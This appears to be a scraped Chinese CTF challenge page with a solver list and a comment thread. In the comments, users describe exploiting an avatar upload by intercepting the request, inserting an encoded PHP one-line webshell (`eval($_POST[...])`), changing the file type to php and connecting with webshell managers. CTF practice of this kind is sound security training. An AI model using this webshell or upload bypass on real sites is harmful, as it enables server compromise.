评分(8)
解题动态
yijueo 攻破了该题 2天前
donbrothers 攻破了该题 4天前
tommyxy 攻破了该题 7天前
15181405972 攻破了该题 8天前
15346899030 攻破了该题 8天前
gl 攻破了该题 10天前
Bojing 攻破了该题 11天前
LMSY 攻破了该题 12天前
molanlan 攻破了该题 12天前
gyssong 攻破了该题 13天前
liqliq 攻破了该题 14天前
OldWolfofFarron 攻破了该题 15天前
15826978220 攻破了该题 17天前
chang123 攻破了该题 20天前
0DayHP 攻破了该题 21天前
adminhrp 攻破了该题 23天前
t0ur1st 攻破了该题 25天前
TwTsaltfish 攻破了该题 29天前
15575401591 攻破了该题 1月前
评论
W3nt0Ddy 2年前
举报
好奇怪的题但是还是做出来了
ZZOok 2年前
举报
高版本php好像可以防止菜刀连接,木马用REQUEST的能够直接在url上操作,一句话设置的密码参数不要加''号,不然会报错。
xiaobaidectf 2年前
举报
尝试了好多次,总是连不上(显示为空),换同学的号,一样的操作后,成了(惊喜),转回自己的号再来一遍,顺利。郁闷之前咋就不行呢?!
ALLBUG 2年前
举报
人麻了,菜刀死活连不上
不会打CTF的向南 2年前
举报
https://blog.csdn.net/m0_61011147/article/details/122963125
狐萝卜CarroT 2年前
举报
注入点在上传头像那 发布二货那里也可以上传图片,不过是不是注入点我没试
boob 2年前
举报
三个蚁剑冰鞋菜刀都连不上 真是邪了门了 浪费金币 淦
狐萝卜CarroT 2年前
举报
@boob 一句话木马都长一个样啊
狐萝卜CarroT 2年前
举报
@boob 我第一次尝试的时候转码后最后一位是个”+“,就出问题了。
boob 2年前
举报
@狐萝卜CarroT 你的一句话木马可以看发一下看看吗
狐萝卜CarroT 2年前
举报
可能是上传的一句话木马的问题
study123 2年前
举报
注意有些评论的字符被bugku过滤替换掉了
study123 2年前
举报
用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
study123 2年前
举报
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php